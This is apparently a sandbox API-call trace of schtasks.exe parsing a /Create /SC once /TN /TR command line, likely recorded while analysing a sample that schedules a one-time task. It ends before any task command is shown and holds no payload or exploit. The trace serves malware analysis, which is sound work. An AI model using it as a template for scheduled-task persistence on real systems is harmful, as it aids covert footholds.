lstrlenW (lpString="schtasks.exe") returned 12 [0038.779] lstrlenW (lpString="schtasks.exe") returned 12 [0038.779] lstrlenW (lpString=".EXE") returned 4 [0038.780] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0038.781] lstrlenW (lpString="schtasks.exe") returned 12 [0038.781] lstrlenW (lpString=".EXE") returned 4 [0038.781] _memicmp (_Buf1=0x5a4b58, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.781] lstrlenW (lpString="schtasks") returned 8 [0038.781] _memicmp (_Buf1=0x5a4bb8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.782] _memicmp (_Buf1=0x5a4bd0, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.782] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5a6668, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0038.782] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0038.783] _vsnwprintf (in: _Buffer=0x5a65c0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18f710 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0038.783] SetLastError (dwErrCode=0x0) [0038.783] GetThreadLocale () returned 0x409 [0038.783] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.783] lstrlenW (lpString="?") returned 1 [0038.783] GetThreadLocale () returned 0x409 [0038.784] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.784] lstrlenW (lpString="create") returned 6 [0038.784] GetThreadLocale () returned 0x409 [0038.784] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.784] lstrlenW (lpString="delete") returned 6 [0038.784] GetThreadLocale () returned 0x409 [0038.784] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.784] lstrlenW (lpString="query") returned 5 [0038.784] GetThreadLocale () returned 0x409 [0038.784] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.785] lstrlenW (lpString="change") returned 6 [0038.785] GetThreadLocale () returned 0x409 [0038.785] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.785] lstrlenW (lpString="run") returned 3 [0038.785] GetThreadLocale () returned 0x409 [0038.785] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.785] lstrlenW (lpString="end") returned 3 [0038.785] GetThreadLocale () returned 0x409 [0038.785] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.785] lstrlenW (lpString="showsid") returned 7 [0038.785] GetThreadLocale () returned 0x409 [0038.786] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0038.786] SetLastError (dwErrCode=0x0) [0038.786] SetLastError (dwErrCode=0x0) [0038.786] lstrlenW (lpString="/Create") returned 7 [0038.786] lstrlenW (lpString="-/") returned 2 [0038.786] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.786] lstrlenW (lpString="?") returned 1 [0038.786] lstrlenW (lpString="?") returned 1 [0038.786] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.787] lstrlenW (lpString="Create") returned 6 [0038.787] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.787] _vsnwprintf (in: _Buffer=0x5a4c00, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|?|") returned 3 [0038.787] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|Create|") returned 8 [0038.787] lstrlenW (lpString="|?|") returned 3 [0038.787] lstrlenW (lpString="|Create|") returned 8 [0038.787] SetLastError (dwErrCode=0x490) [0038.788] lstrlenW (lpString="create") returned 6 [0038.788] lstrlenW (lpString="create") returned 6 [0038.788] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.788] lstrlenW (lpString="Create") returned 6 [0038.788] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.788] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|create|") returned 8 [0038.788] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|Create|") returned 8 [0038.788] lstrlenW (lpString="|create|") returned 8 [0038.789] lstrlenW (lpString="|Create|") returned 8 [0038.789] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0038.789] SetLastError (dwErrCode=0x0) [0038.789] SetLastError (dwErrCode=0x0) [0038.789] SetLastError (dwErrCode=0x0) [0038.789] lstrlenW (lpString="/SC") returned 3 [0038.789] lstrlenW (lpString="-/") returned 2 [0038.789] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.789] lstrlenW (lpString="?") returned 1 [0038.790] lstrlenW (lpString="?") returned 1 [0038.790] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.790] lstrlenW (lpString="SC") returned 2 [0038.790] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.790] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|?|") returned 3 [0038.790] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.790] lstrlenW (lpString="|?|") returned 3 [0038.790] lstrlenW (lpString="|SC|") returned 4 [0038.790] SetLastError (dwErrCode=0x490) [0038.790] lstrlenW (lpString="create") returned 6 [0038.790] lstrlenW (lpString="create") returned 6 [0038.791] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.791] lstrlenW (lpString="SC") returned 2 [0038.791] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.791] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|create|") returned 8 [0038.791] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.791] lstrlenW (lpString="|create|") returned 8 [0038.791] lstrlenW (lpString="|SC|") returned 4 [0038.791] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0038.791] SetLastError (dwErrCode=0x490) [0038.791] lstrlenW (lpString="delete") returned 6 [0038.792] lstrlenW (lpString="delete") returned 6 [0038.792] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.792] lstrlenW (lpString="SC") returned 2 [0038.792] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.792] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|delete|") returned 8 [0038.792] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.792] lstrlenW (lpString="|delete|") returned 8 [0038.792] lstrlenW (lpString="|SC|") returned 4 [0038.792] StrStrIW (lpFirst="|delete|", lpSrch="|SC|") returned 0x0 [0038.792] SetLastError (dwErrCode=0x490) [0038.793] lstrlenW (lpString="query") returned 5 [0038.793] lstrlenW (lpString="query") returned 5 [0038.793] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.793] lstrlenW (lpString="SC") returned 2 [0038.793] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.793] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|query|") returned 7 [0038.793] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.793] lstrlenW (lpString="|query|") returned 7 [0038.793] lstrlenW (lpString="|SC|") returned 4 [0038.793] StrStrIW (lpFirst="|query|", lpSrch="|SC|") returned 0x0 [0038.794] SetLastError (dwErrCode=0x490) [0038.794] lstrlenW (lpString="change") returned 6 [0038.794] lstrlenW (lpString="change") returned 6 [0038.794] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.794] lstrlenW (lpString="SC") returned 2 [0038.794] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.794] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|change|") returned 8 [0038.794] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.794] lstrlenW (lpString="|change|") returned 8 [0038.794] lstrlenW (lpString="|SC|") returned 4 [0038.795] StrStrIW (lpFirst="|change|", lpSrch="|SC|") returned 0x0 [0038.795] SetLastError (dwErrCode=0x490) [0038.795] lstrlenW (lpString="run") returned 3 [0038.795] lstrlenW (lpString="run") returned 3 [0038.795] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.795] lstrlenW (lpString="SC") returned 2 [0038.795] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.795] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|run|") returned 5 [0038.795] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.795] lstrlenW (lpString="|run|") returned 5 [0038.795] lstrlenW (lpString="|SC|") returned 4 [0038.795] StrStrIW (lpFirst="|run|", lpSrch="|SC|") returned 0x0 [0038.795] SetLastError (dwErrCode=0x490) [0038.796] lstrlenW (lpString="end") returned 3 [0038.796] lstrlenW (lpString="end") returned 3 [0038.796] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.796] lstrlenW (lpString="SC") returned 2 [0038.796] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.796] _vsnwprintf (in: _Buffer=0x5a5268, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|end|") returned 5 [0038.796] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.796] lstrlenW (lpString="|end|") returned 5 [0038.796] lstrlenW (lpString="|SC|") returned 4 [0038.796] StrStrIW (lpFirst="|end|", lpSrch="|SC|") returned 0x0 [0038.796] SetLastError (dwErrCode=0x490) [0038.796] lstrlenW (lpString="showsid") returned 7 [0038.796] lstrlenW (lpString="showsid") returned 7 [0038.796] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.796] lstrlenW (lpString="SC") returned 2 [0038.797] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.797] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|showsid|") returned 9 [0038.797] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|SC|") returned 4 [0038.797] lstrlenW (lpString="|showsid|") returned 9 [0038.797] lstrlenW (lpString="|SC|") returned 4 [0038.797] StrStrIW (lpFirst="|showsid|", lpSrch="|SC|") returned 0x0 [0038.797] SetLastError (dwErrCode=0x490) [0038.797] SetLastError (dwErrCode=0x490) [0038.797] SetLastError (dwErrCode=0x0) [0038.797] lstrlenW (lpString="/SC") returned 3 [0038.797] StrChrIW (lpStart="/SC", wMatch=0x3a) returned 0x0 [0038.797] SetLastError (dwErrCode=0x490) [0038.797] SetLastError (dwErrCode=0x0) [0038.797] lstrlenW (lpString="/SC") returned 3 [0038.797] SetLastError (dwErrCode=0x0) [0038.798] SetLastError (dwErrCode=0x0) [0038.798] lstrlenW (lpString="once") returned 4 [0038.798] lstrlenW (lpString="-/") returned 2 [0038.798] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0038.798] SetLastError (dwErrCode=0x490) [0038.798] SetLastError (dwErrCode=0x490) [0038.798] SetLastError (dwErrCode=0x0) [0038.798] lstrlenW (lpString="once") returned 4 [0038.798] StrChrIW (lpStart="once", wMatch=0x3a) returned 0x0 [0038.798] SetLastError (dwErrCode=0x490) [0038.798] SetLastError (dwErrCode=0x0) [0038.798] lstrlenW (lpString="once") returned 4 [0038.798] SetLastError (dwErrCode=0x0) [0038.798] SetLastError (dwErrCode=0x0) [0038.798] lstrlenW (lpString="/TN") returned 3 [0038.798] lstrlenW (lpString="-/") returned 2 [0038.798] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.799] lstrlenW (lpString="?") returned 1 [0038.799] lstrlenW (lpString="?") returned 1 [0038.799] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.799] lstrlenW (lpString="TN") returned 2 [0038.799] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.799] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|?|") returned 3 [0038.799] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.799] lstrlenW (lpString="|?|") returned 3 [0038.799] lstrlenW (lpString="|TN|") returned 4 [0038.799] SetLastError (dwErrCode=0x490) [0038.799] lstrlenW (lpString="create") returned 6 [0038.799] lstrlenW (lpString="create") returned 6 [0038.799] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.799] lstrlenW (lpString="TN") returned 2 [0038.799] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.799] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|create|") returned 8 [0038.800] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.800] lstrlenW (lpString="|create|") returned 8 [0038.800] lstrlenW (lpString="|TN|") returned 4 [0038.800] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0038.800] SetLastError (dwErrCode=0x490) [0038.800] lstrlenW (lpString="delete") returned 6 [0038.800] lstrlenW (lpString="delete") returned 6 [0038.800] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.800] lstrlenW (lpString="TN") returned 2 [0038.800] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.800] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|delete|") returned 8 [0038.800] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.800] lstrlenW (lpString="|delete|") returned 8 [0038.800] lstrlenW (lpString="|TN|") returned 4 [0038.800] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0038.800] SetLastError (dwErrCode=0x490) [0038.800] lstrlenW (lpString="query") returned 5 [0038.801] lstrlenW (lpString="query") returned 5 [0038.801] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.801] lstrlenW (lpString="TN") returned 2 [0038.801] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.801] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|query|") returned 7 [0038.801] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.801] lstrlenW (lpString="|query|") returned 7 [0038.801] lstrlenW (lpString="|TN|") returned 4 [0038.801] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0038.801] SetLastError (dwErrCode=0x490) [0038.801] lstrlenW (lpString="change") returned 6 [0038.801] lstrlenW (lpString="change") returned 6 [0038.801] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.801] lstrlenW (lpString="TN") returned 2 [0038.801] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.801] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|change|") returned 8 [0038.802] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.802] lstrlenW (lpString="|change|") returned 8 [0038.802] lstrlenW (lpString="|TN|") returned 4 [0038.802] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0038.802] SetLastError (dwErrCode=0x490) [0038.802] lstrlenW (lpString="run") returned 3 [0038.802] lstrlenW (lpString="run") returned 3 [0038.802] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.802] lstrlenW (lpString="TN") returned 2 [0038.802] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.802] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|run|") returned 5 [0038.802] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.802] lstrlenW (lpString="|run|") returned 5 [0038.802] lstrlenW (lpString="|TN|") returned 4 [0038.802] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0038.802] SetLastError (dwErrCode=0x490) [0038.802] lstrlenW (lpString="end") returned 3 [0038.803] lstrlenW (lpString="end") returned 3 [0038.803] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.803] lstrlenW (lpString="TN") returned 2 [0038.803] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.803] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|end|") returned 5 [0038.803] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.803] lstrlenW (lpString="|end|") returned 5 [0038.803] lstrlenW (lpString="|TN|") returned 4 [0038.803] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0038.803] SetLastError (dwErrCode=0x490) [0038.803] lstrlenW (lpString="showsid") returned 7 [0038.803] lstrlenW (lpString="showsid") returned 7 [0038.803] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.803] lstrlenW (lpString="TN") returned 2 [0038.803] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.803] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|showsid|") returned 9 [0038.804] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TN|") returned 4 [0038.804] lstrlenW (lpString="|showsid|") returned 9 [0038.804] lstrlenW (lpString="|TN|") returned 4 [0038.804] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0038.804] SetLastError (dwErrCode=0x490) [0038.804] SetLastError (dwErrCode=0x490) [0038.804] SetLastError (dwErrCode=0x0) [0038.804] lstrlenW (lpString="/TN") returned 3 [0038.804] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0038.804] SetLastError (dwErrCode=0x490) [0038.804] SetLastError (dwErrCode=0x0) [0038.804] lstrlenW (lpString="/TN") returned 3 [0038.804] SetLastError (dwErrCode=0x0) [0038.804] SetLastError (dwErrCode=0x0) [0038.804] lstrlenW (lpString="") returned 0 [0038.804] SetLastError (dwErrCode=0x490) [0038.805] SetLastError (dwErrCode=0x0) [0038.805] lstrlenW (lpString="") returned 0 [0038.805] SetLastError (dwErrCode=0x490) [0038.805] SetLastError (dwErrCode=0x0) [0038.805] lstrlenW (lpString="") returned 0 [0038.805] SetLastError (dwErrCode=0x0) [0038.805] SetLastError (dwErrCode=0x0) [0038.805] lstrlenW (lpString="/TR") returned 3 [0038.805] lstrlenW (lpString="-/") returned 2 [0038.805] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.805] lstrlenW (lpString="?") returned 1 [0038.805] lstrlenW (lpString="?") returned 1 [0038.805] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.805] lstrlenW (lpString="TR") returned 2 [0038.805] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.805] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|?|") returned 3 [0038.806] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.806] lstrlenW (lpString="|?|") returned 3 [0038.806] lstrlenW (lpString="|TR|") returned 4 [0038.806] SetLastError (dwErrCode=0x490) [0038.806] lstrlenW (lpString="create") returned 6 [0038.806] lstrlenW (lpString="create") returned 6 [0038.806] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.806] lstrlenW (lpString="TR") returned 2 [0038.806] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.806] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|create|") returned 8 [0038.806] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.806] lstrlenW (lpString="|create|") returned 8 [0038.806] lstrlenW (lpString="|TR|") returned 4 [0038.806] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0038.806] SetLastError (dwErrCode=0x490) [0038.806] lstrlenW (lpString="delete") returned 6 [0038.806] lstrlenW (lpString="delete") returned 6 [0038.807] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.807] lstrlenW (lpString="TR") returned 2 [0038.807] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.807] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|delete|") returned 8 [0038.807] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.807] lstrlenW (lpString="|delete|") returned 8 [0038.807] lstrlenW (lpString="|TR|") returned 4 [0038.811] StrStrIW (lpFirst="|delete|", lpSrch="|TR|") returned 0x0 [0038.811] SetLastError (dwErrCode=0x490) [0038.811] lstrlenW (lpString="query") returned 5 [0038.811] lstrlenW (lpString="query") returned 5 [0038.811] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.811] lstrlenW (lpString="TR") returned 2 [0038.811] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.811] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|query|") returned 7 [0038.811] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.811] lstrlenW (lpString="|query|") returned 7 [0038.811] lstrlenW (lpString="|TR|") returned 4 [0038.811] StrStrIW (lpFirst="|query|", lpSrch="|TR|") returned 0x0 [0038.812] SetLastError (dwErrCode=0x490) [0038.812] lstrlenW (lpString="change") returned 6 [0038.812] lstrlenW (lpString="change") returned 6 [0038.812] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.812] lstrlenW (lpString="TR") returned 2 [0038.812] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.812] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|change|") returned 8 [0038.812] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.812] lstrlenW (lpString="|change|") returned 8 [0038.812] lstrlenW (lpString="|TR|") returned 4 [0038.812] StrStrIW (lpFirst="|change|", lpSrch="|TR|") returned 0x0 [0038.812] SetLastError (dwErrCode=0x490) [0038.812] lstrlenW (lpString="run") returned 3 [0038.812] lstrlenW (lpString="run") returned 3 [0038.812] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.812] lstrlenW (lpString="TR") returned 2 [0038.812] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.812] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|run|") returned 5 [0038.812] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.812] lstrlenW (lpString="|run|") returned 5 [0038.813] lstrlenW (lpString="|TR|") returned 4 [0038.813] StrStrIW (lpFirst="|run|", lpSrch="|TR|") returned 0x0 [0038.813] SetLastError (dwErrCode=0x490) [0038.813] lstrlenW (lpString="end") returned 3 [0038.813] lstrlenW (lpString="end") returned 3 [0038.813] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.813] lstrlenW (lpString="TR") returned 2 [0038.813] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.813] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|end|") returned 5 [0038.813] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.813] lstrlenW (lpString="|end|") returned 5 [0038.813] lstrlenW (lpString="|TR|") returned 4 [0038.813] StrStrIW (lpFirst="|end|", lpSrch="|TR|") returned 0x0 [0038.813] SetLastError (dwErrCode=0x490) [0038.813] lstrlenW (lpString="showsid") returned 7 [0038.813] lstrlenW (lpString="showsid") returned 7 [0038.813] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.813] lstrlenW (lpString="TR") returned 2 [0038.813] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.814] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|showsid|") returned 9 [0038.814] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f6f8 | out: _Buffer="|TR|") returned 4 [0038.814] lstrlenW (lpString="|showsid|") returned 9 